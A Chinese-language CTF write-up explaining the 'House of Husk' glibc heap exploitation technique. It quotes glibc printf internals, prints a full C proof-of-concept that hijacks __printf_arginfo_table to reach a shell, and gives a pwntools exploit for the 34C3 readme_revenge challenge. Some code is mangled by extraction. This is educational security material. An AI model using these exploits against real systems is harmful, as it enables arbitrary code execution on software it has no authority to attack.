roger 发表于 2020-5-7 21:23:42


前言  在BUU群里看到glzjin师傅的每日推送,看到了一个有趣的glibc新型攻击方式,自己实践了一下,感觉还是挺好用的,在某些情况下比传统攻击更方便,这里结合源码和自己的调试和大家分享一下,如果有哪里不对恳请师傅们斧正。该攻击链发现者的博文如下:House of Husk (仮)。本文用到的代码等文件在这里文件
攻击原理  这种攻击方式主要是利用了printf的一个调用链,应用场景是只能分配较大chunk时(超过fastbin),存在或可以构造出UAF漏洞。
/* Register FUNC to be called to format SPEC specifiers.*/  int
  __register_printf_function (int spec, printf_function converter,
  printf_arginfo_function arginfo)
  return __register_printf_specifier (spec, converter,
  (printf_arginfo_size_function*) arginfo);
  /* Register FUNC to be called to format SPEC specifiers.*/
  __register_printf_specifier (int spec, printf_function converter,
  printf_arginfo_size_function arginfo)
  if (spec < 0 || spec > (int) UCHAR_MAX)
  __set_errno (EINVAL);
  return -1;
  int result = 0;
  __libc_lock_lock (lock);
  if (__printf_function_table == NULL)
  __printf_arginfo_table = (printf_arginfo_size_function **)
  calloc (UCHAR_MAX + 1,>
  if (__printf_arginfo_table == NULL)
  result = -1;
  goto out;
  __printf_function_table = (printf_function **)
  (__printf_arginfo_table + UCHAR_MAX + 1);
  __printf_function_table = converter;
  __printf_arginfo_table = arginfo;
  __libc_lock_unlock (lock);
  return result;
/* Type of a printf specifier-handler function.  STREAM is the FILE on which to write output.
  INFO gives information about the format specification.
  ARGS is a vector of pointers to the argument data;
  the number of pointers will be the number returned
  by the associated arginfo function for the same INFO.
  The function should return the number of characters written,
  or -1 for errors.*/
  typedef int printf_function (FILE *__stream,
  const struct printf_info *__info,
  const void *const *__args);
  extern printf_function **__printf_function_table;
  int function_done;
  if (spec <= UCHAR_MAX
  && __printf_function_table != NULL
  && __printf_function_table[(size_t) spec] != NULL)
  const void **ptr = alloca (specs.ndata_args
  /* Fill in an array of pointers to the argument values.*/
  for (unsigned int i = 0; i < specs.ndata_args;
  ptr = &args_value.data_arg + i];
  /* Call the function.*/
  function_done = __printf_function_table[(size_t) spec]
  (s, &, ptr);
  if (function_done != -2)
  /* If an error occurred we don't have information
  about # of chars.*/
  if (function_done < 0)
  /* Function has set errno.*/
  done = -1;
  goto all_done;
  done_add (function_done);
/* Type of a printf specifier-arginfo function.  INFO gives information about the format specification.
  N, ARGTYPES, *SIZE has to contain the>
  user-defined types, and return value are as for parse_printf_format
  except that -1 should be returned if the handler cannot handle
  this case.This allows to partially overwrite the functionality
  of existing format specifiers.*/
  typedef int printf_arginfo_size_function (const struct printf_info *__info,
  size_t __n, int *__argtypes,
  int *__size);
  /* Get the format specification.*/
  spec->info.spec = (wchar_t) *format++;
  spec->size = -1;
  if (__builtin_expect (__printf_function_table == NULL, 1)
  || spec->info.spec > UCHAR_MAX
  || __printf_arginfo_table == NULL
  /* We don't try to get the types for all arguments if the format
  uses more than one.The normal case is covered though.If
  the call returns -1 we continue with the normal specifiers.*/
  || (int) (spec->ndata_args = (*__printf_arginfo_table)
  (&spec->info, 1, &spec->data_arg_type,
  &spec->size)) < 0)
  /* Find the data argument types of a built-in spec.*/
  spec->ndata_args = 1;
  struct printf_spec
  /* Information parsed from the format spec.*/
  struct printf_info info;
  /* Pointers into the format string for the end of this format
  spec and the next (or to the end of the string if no more).*/
  const UCHAR_T *end_of_fmt, *next_fmt;
  /* Position of arguments for precision and>
  the constant value.*/
  int prec_arg,>
  int data_arg;                /* Position of data argument.*/
  int data_arg_type;                /* Type of first argument.*/
  /* Number of arguments consumed by this format specifier.*/
  size_t ndata_args;
//glibc-2.27/vfprintf.c:1335  /* Use the slow path in case any printf handler is registered.*/
  if (__glibc_unlikely (__printf_function_table != NULL
  || __printf_modifier_table != NULL
  || __printf_va_arg_table != NULL))
  goto do_positional;
  /* Hand off processing for positional parameters.*/
  if (__glibc_unlikely (workstart != NULL))
  free (workstart);
  workstart = NULL;
  done = printf_positional (s, format, readonly_format, ap, &ap_save,
  done, nspecs_done, lead_str_end, work_buffer,
  save_errno, grouping, thousands_sep);
poc分析  这里使用的poc就直接用攻击发现者提供的源代码,运行环境为ubuntu 18.04/glibc 2.27,编译命令为gcc ./poc.c -g -fPIE -no-pie -o poc(关闭pie方便调试)。
  代码模拟了UAF漏洞,先分配一个超过fastbin的块,释放之后会进入unsorted bin。预先分配两个chunk,第一个用来伪造__printf_function_table,第二个用来伪造__printf_arginfo_table。将__printf_arginfo_table['X']处的函数指针改为one_gadget。
  使用unsorted bin attack改写global_max_fast为main_arena+88从而使得释放的所有块都按fastbin处理(都是超过large bin大小的堆块不会进tcache)。
  在这里有一个很重要的知识就是fastbin的堆块地址会存放在main_arena中,从main_arena+8开始存放fastbin的头指针,一直往后推,由于平时的fastbin默认阈值为0x80,所以在glibc-2.23的环境下最多存放到main_arena+0x48,现在我们将阈值改为0x7f*导致几乎所有sz的chunk都被当做fastbin,其地址会从main_arena+8开始,根据sz不同往libc覆写堆地址。如此一来,只要我们计算好__printf_arginfo_table和main_arena的地址偏移,进而得到合适的sz,就可以在之后释放这个伪造table的chunk时覆写__printf_arginfo_table为heap_addr。这种利用方式在*CTF2019->heap_master的题解中我曾经使用过,详情可以参见Star CTF heap_master的1.2.4.3。
  有了上述知识铺垫,整个攻击流程就比较清晰了,总结一下,先UAF改global_max_fast为main_arena+88,之后释放合适sz的块到fastbin,从而覆写__printf_arginfo_table表为heap地址,heap['X']被覆写为了one_gadget,在调用这个函数指针时即可get shell。
/**  * This is a Proof-of-Concept for House of Husk
  * This PoC is supposed to be run with libc-2.27.
  #include <stdio.h>
  #include <stdlib.h>
  #define offset2size(ofs) ((ofs) * 2 - 0x10)
  #define MAIN_ARENA       0x3ebc40
  #define MAIN_ARENA_DELTA 0x60
  #define GLOBAL_MAX_FAST0x3ed940
  #define PRINTF_FUNCTABLE 0x3f0658
  #define PRINTF_ARGINFO   0x3ec870
  #define ONE_GADGET       0x10a38c
  int main (void)
  unsigned long libc_base;
  char *a;
  setbuf(stdout, NULL); // make printf quiet
  /* leak libc */
  a = malloc(0x500); /* UAF chunk */
  a = malloc(offset2size(PRINTF_FUNCTABLE - MAIN_ARENA));
  a = malloc(offset2size(PRINTF_ARGINFO - MAIN_ARENA));
  a = malloc(0x500); /* avoid consolidation */
  libc_base = *(unsigned long*)a - MAIN_ARENA - MAIN_ARENA_DELTA;
  printf("libc @ 0x%lxn", libc_base);
  /* prepare fake printf arginfo table */
  *(unsigned long*)(a + ('X' - 2) * 8) = libc_base + ONE_GADGET;
  //*(unsigned long*)(a + ('X' - 2) * 8) = libc_base + ONE_GADGET;
  //now __printf_arginfo_table['X'] = one_gadget;
  /* unsorted bin attack */
  *(unsigned long*)(a + 8) = libc_base + GLOBAL_MAX_FAST - 0x10;
  a = malloc(0x500); /* overwrite global_max_fast */
  /* overwrite __printf_arginfo_table and __printf_function_table */
  free(a);// __printf_function_table => a heap_addr which is not NULL
  free(a);//__printf_arginfo_table => one_gadget
  /* ignite! */
  printf("%X", 0);
  return 0;
动态分析  glibc的调试我们用的比较多了,在涉及到库函数的时候最好结合源码进行调试,在glibc下载这里下载源码,解压之后使用directory添加源码目录
b* 0x400774  directory ~/Desktop/CTF/glibc-2.27/stdio-common
  在printf下断点,可以看到此时__printf_arginfo_table伪造完成,我们使用rwatch *0x60be50下内存断点,继续运行。
扩展  当然,除了覆写第二个table外,改第一个一样可以get shell,流程和调试我们已经讲的差不多了,这里只需把one_gadget赋值代码改为*(unsigned long*)(a + ('X' - 2) * 8) = libc_base + ONE_GADGET;即可,我们用同样方式在gdb下调试poc并设置硬件断点
练习  经过查找我发现这个知识在34c3 CTF的时候已经有过考察。原题为readme_revenge。
漏洞分析&&漏洞利用  使用checksec查看保护机制,发现无PIE,got表可写,是静态文件,在IDA的字符串搜索中发现flag是存放在.data段的,因此只要想办法读flag就可以。
wz@wz-virtual-machine:~/Desktop/CTF/house-of-husk$ checksec ./readme_revenge  [*] '/home/wz/Desktop/CTF/house-of-husk/readme_revenge'
  Arch:   amd64-64-little
  RELRO:    Partial>
  Stack:    Canary found
  NX:       NX enabled
  PIE:      No PIE (0x400000)
int __cdecl main(int argc, const char **argv, const char **envp)  {
  _isoc99_scanf((unsigned __int64)&unk_48D184);
  printf((unsigned __int64)"Hi, %s. Bye.n");
  return 0;
  .data:00000000006B4040               public flag
  .data:00000000006B4040 flag            db '34C3_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',0
#coding=utf-8  from pwn import *
  context.terminal = ['tmux','split','-h']
  debug = 1
  elf = ELF('./readme_revenge')
  libc_offset = 0x3c4b20
  gadgets =
  if debug:
  libc = ELF('/lib/x86_64-linux-gnu/')
  p = process('./readme_revenge')
  libc = ELF('./libc_local')
  p = remote('',20173)
  printf_function_table = 0x6b7a28
  printf_arginfo_table = 0x6b7aa8
  input_addr = 0x6b73e0
  stack_chk_fail = 0x4359b0
  flag_addr = 0x6b4040
  argv_addr = 0x6b7980
  def exp():
  #leak libc
  #gdb.attach(p,'b* 0x400a51')
  payload = p64(flag_addr)
  payload = payload.ljust(0x73*8,'x00')
  payload += p64(stack_chk_fail)
  payload = payload.ljust(argv_addr-input_addr,'x00')
  payload += p64(input_addr)#arg
  payload = payload.ljust(printf_function_table-input_addr,'x00')
  payload += p64(1)#func not null
  payload = payload.ljust(printf_arginfo_table-input_addr,'x00')
  payload += p64(input_addr)#arginfo func
调试  可以看到在输入完毕之后伪造的函数指针已经参数已经准备完毕,在调用printf("..%s..")的时候会调用我们的注册函数指针输出argv处的flag。
总结  这种攻击方式其实并不新鲜,我们既然能利用fastbin覆写main_arena后面的内容我们完全可以选择__free_hook这样更简单的目标,不过printf这条调用链确实是新鲜的知识,调试一番学到了很多。
参考  House of Husk (仮)
  pwn 34C3CTF2017 readme_revenge

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